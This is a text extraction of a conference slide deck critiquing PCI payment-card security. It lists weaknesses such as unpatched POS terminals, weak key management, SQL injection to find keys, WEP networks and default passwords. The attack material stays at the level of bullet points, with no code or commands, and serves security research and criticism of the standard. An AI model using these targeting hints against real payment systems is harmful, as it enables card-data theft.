0 évaluation0% ont trouvé ce document utile (0 vote)
28 vues45 pages
This document summarizes a presentation about the security flaws in credit card and payment systems. It discusses how credit cards work, the players involved like merchants and banks, and the PCI security standard meant to protect payment data. However, it argues that PCI has many weaknesses like vague requirements, non-technical audits, and outdated systems. It then outlines research on exploiting these flaws, like finding weak encryption keys, targeting vulnerable payment terminals, and using simple attacks. The conclusion is that major data breaches are possible if merchants do not improve their security to meet modern standards.
This document summarizes a presentation about the security flaws in credit card and payment systems. It discusses how credit cards work, the players involved like merchants and banks, and the PCI security standard meant to protect payment data. However, it argues that PCI has many weaknesses like vague requirements, non-technical audits, and outdated systems. It then outlines research on exploiting these flaws, like finding weak encryption keys, targeting vulnerable payment terminals, and using simple attacks. The conclusion is that major data breaches are possible if merchants do not improve their security to meet modern standards.
Droits d'auteur :
Attribution Non-Commercial (BY-NC)
Formats disponibles
Téléchargez comme PPT, PDF, TXT ou lisez en ligne sur Scribd
This document summarizes a presentation about the security flaws in credit card and payment systems. It discusses how credit cards work, the players involved like merchants and banks, and the PCI security standard meant to protect payment data. However, it argues that PCI has many weaknesses like vague requirements, non-technical audits, and outdated systems. It then outlines research on exploiting these flaws, like finding weak encryption keys, targeting vulnerable payment terminals, and using simple attacks. The conclusion is that major data breaches are possible if merchants do not improve their security to meet modern standards.
Droits d'auteur :
Attribution Non-Commercial (BY-NC)
Formats disponibles
Téléchargez comme PPT, PDF, TXT ou lisez en ligne sur Scribd
merchant with your credit card About this talk… • Work in progress • Agenda – Credit card backgrounder (hacker style) – PCI Overview & Defenses – PCI Flaws
Ongoing project, to be updated
TSC LABS Plastic Money - Plastic Trust 2
Who do you trust?
TSC LABS Plastic Money - Plastic Trust 3
A California Driver’s License
TSC LABS Plastic Money - Plastic Trust 4
CA License Spec
TSC LABS Plastic Money - Plastic Trust 5
PAN Tester (Front)
TSC LABS Plastic Money - Plastic Trust 6
Commerce without Trust • Cash Commerce – You visit a merchant – You give them (money) – They give you (goods or services)
TSC LABS Plastic Money - Plastic Trust 7
Commerce with Trust • Diner’s Club starts in the 50’s – “A customer is as good as their name” – Merchant (via a Bank) extends ‘credit’ – Customer carries (paper) ‘credit card’ – Merchant trusts customer to pay – Customer extends no extra trust to merchant
TSC LABS Plastic Money - Plastic Trust 8
And the joke is… • Credit cards are clonable • Trusting the merchant was a bad idea
TSC LABS Plastic Money - Plastic Trust 9
PCI
TSC LABS Plastic Money - Plastic Trust 10
The Players… • Customers • Merchants • Acquirers • Banks • Credit Card ‘Associations’ • The bad guys
TSC LABS Plastic Money - Plastic Trust 11
Payment Card Industry • Industry association – Agenda: • defend the brand • Make the customers feel safe • Protect profits – “Standards” issued – Created auditor/expert role – Advocate of “PCI Security”
TSC LABS Plastic Money - Plastic Trust 12
Credit Cards • ISO Standard • Machine readable (“partially”) • Clonable • Purely data
TSC LABS Plastic Money - Plastic Trust 13
CC Process Assumptions • (“CC” means credit card) • The customer will defend the CC • The merchant will defend the CC • It’s hard to steal the CC • If the CC is stolen, revocation will minimize damage
TSC LABS Plastic Money - Plastic Trust 14
PCI “Standard” • Requirement 1: Install and maintain a firewall configuration to protect cardholder data • Requirement 2: Do not use vendor-supplied defaults for system passwords and other • security parameters • Requirement 3: Protect stored cardholder data • Requirement 4: Encrypt transmission of cardholder data across open, public networks • Requirement 5: Use and regularly update anti-virus software • Requirement 6: Develop and maintain secure systems and applications • Requirement 7: Restrict access to cardholder data by business need-to-know • Requirement 8: Assign a unique ID to each person with computer access • Requirement 9: Restrict physical access to cardholder data • Requirement 10: Track and monitor all access to network resources and cardholder data • Requirement 11: Regularly test security systems and processes • Requirement 12: Maintain a policy that addresses information security
TSC LABS Plastic Money - Plastic Trust 15
Interpretations • There are many (at least one per auditor) • Not generally as good as current ‘best practice’ • Implicitly hides merchants who don’t use ‘best practice’ • Advisory – “they won’t really fine us”
TSC LABS Plastic Money - Plastic Trust 16
PCI Defense
TSC LABS Plastic Money - Plastic Trust 17
PAN Sample (Front)
TSC LABS Plastic Money - Plastic Trust 18
PAN Sample (Back)
TSC LABS Plastic Money - Plastic Trust 19
PCI Defenses • The standard • The audit process • Technical upgrades and workarounds • Payment process improvements • Best Practices for a modern enterprise
TSC LABS Plastic Money - Plastic Trust 20
Defenses – the standard • “The usual best-practices motherhood and hacker pie platitudes about computer security.” • Intuitively obvious ‘requirements’ – Never save the CVV – PAN should be encrypted when at rest – PAN should be defended while in motion
TSC LABS Plastic Money - Plastic Trust 21
PCI Defenses - Crypto • Pre-Internet crypto use • Vaguely bank-like crypto • (Some) symmetric algorithms • (Some) key hygiene • (Some) use of encrypted data • (Some) use of encryption in the network
TSC LABS Plastic Money - Plastic Trust 22
PCI Defenses - Audit • Country club auditors • Non-technical • Paid by merchant • Interpreter of requirements • Interpreter of solutions • anonymous
TSC LABS Plastic Money - Plastic Trust 23
PCI Security Research
TSC LABS Plastic Money - Plastic Trust 24
PCI Security Research • Targets – PAN – End nodes • Data – At rest – In motion • Processes – Merchant – Back-end – Contractual
TSC LABS Plastic Money - Plastic Trust 25
PAN Research • PAN Tester – Credit card – Gift Card – Captive cards
TSC LABS Plastic Money - Plastic Trust 26
PAN Tester (Front)
TSC LABS Plastic Money - Plastic Trust 27
PAN Tester (Back)
TSC LABS Plastic Money - Plastic Trust 28
Faux Credit Cards
TSC LABS Plastic Money - Plastic Trust 29
Target Sample
TSC LABS Plastic Money - Plastic Trust 30
Targets • Decrepit POS terminals are mainstream – Win2k is considered modern – Very low horsepower – Not patched – Not encrypted – On undefended network
TSC LABS Plastic Money - Plastic Trust 31
Other Targets • POS networks – 2000 stores across the US talking to a central site is not a “private” network – Substandard defenses by conventional enterprise standards – Comingled with corporate networks – Minimally funded security efforts
TSC LABS Plastic Money - Plastic Trust 32
Other Targets • Acquirer connection • Out of bounds for merchant audits • Not clear anyone checks them • Defense of acquirer not discussed
TSC LABS Plastic Money - Plastic Trust 33
Recon • Physical security of end systems • Process recon • Web access • PAN Processing flaws
TSC LABS Plastic Money - Plastic Trust 34
PCI Violation
TSC LABS Plastic Money - Plastic Trust 35
PCI “Crypto”
TSC LABS Plastic Money - Plastic Trust 36
Crypto Vulnerabilities • No key management • Weak keys • Poor key management • Poor key hygiene • Home-grown crypto • Ignorance of crypto work in the last 5 years
TSC LABS Plastic Money - Plastic Trust 37
Potential Crypto flaws • SQL Injection to find keys in the database • Format glitches • Information leakage (first 6 plus last 4 == 6 decimal digits in namespace…) • Key generation • Algorithm implementations
TSC LABS Plastic Money - Plastic Trust 38
Boring Attacks • Porous perimiter – Web site • #include <web_site_attack.h> – Storefront • Digital limpet mines • Bored quasi-geek employees – Back office • #include <frugal_dp_management.h> – Corporate office • #include <simple_enterprise_attacks.h> TSC LABS Plastic Money - Plastic Trust 39 Boring Targets • Windows 2000 is “current” for POS terminals • Databases contain keys, leaked information • Effectively unsecured networks – 40 bit WEP at best • Genuinely unsecured networks – Cleartext internal networks TSC LABS Plastic Money - Plastic Trust 40 Boring Exploits • Anything in “The Idiot’s Guide to Attacking with Metasploit” • All your (Cisco) passwords are belong to us • Logs? We don’t need no steenkin’ logs • Klingon logins (“authentication is for the weak and timid”) • Passwords last changed when Reagan was President • Passwords based on employee id/name TSC LABS Plastic Money - Plastic Trust 41 Conclusions • A TJX-class incident might happen – Oops old news. • Someone might get caught using 40 bit WEP – Oops old news. • Someone might use a digital limpet mine – Oops old news. • Databases might be compromised… TSC LABS Plastic Money - Plastic Trust 42 Conclusions (Seriously) • Major compromises are possible • Litigation is possible • Paypal on a bad day might be better than Visa • People will start to question the use of pre- Internet legacy payment networks • Merchants should use 21st century network defense technologies • Merchants are enterprises handling money and should act accordingly TSC LABS Plastic Money - Plastic Trust 43 Credits • Conference venue by Toorcon • Three Stooges Driver’s License found at http://www.imhimports.com • Driver’s License Spec: http://www.aamva.org/NR/rdonlyres/66260AD6-64B9-45E9-A253-B8AA32241BE0/0/ 2005DLIDCardSpecV2FINAL.pdf • PAN Sample photographs by Operations • PCI Standard: https://www.pcisecuritystandards.org/pdfs/pci_dss_v1-1.pdf • Visa® Gift Card from Visa International Service Association http://www.visa.com issued by Wells Fargo® Bank • Presentation software Office 2003™ Excel™ by Microsoft®
Disclaimer No actual PANs were harmed in the production of this presentation.